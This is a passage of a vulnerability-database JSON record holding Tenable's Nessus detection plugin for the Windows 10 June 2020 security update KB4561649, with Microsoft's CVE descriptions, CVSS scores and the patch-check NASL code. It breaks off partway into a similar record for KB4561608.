- A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561649: Windows 10 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1234", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1278", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561649.NASL", "href": "https://www.tenable.com/plugins/nessus/137261", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137261);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1234\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561649\");\n script_xref(name:\"MSFT\", value:\"MS20-4561649\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561649: Windows 10 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1334)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561649/windows-10-update-kb4561649\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?111cb6a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561649.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561649'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561649])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:37", "description": "The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, 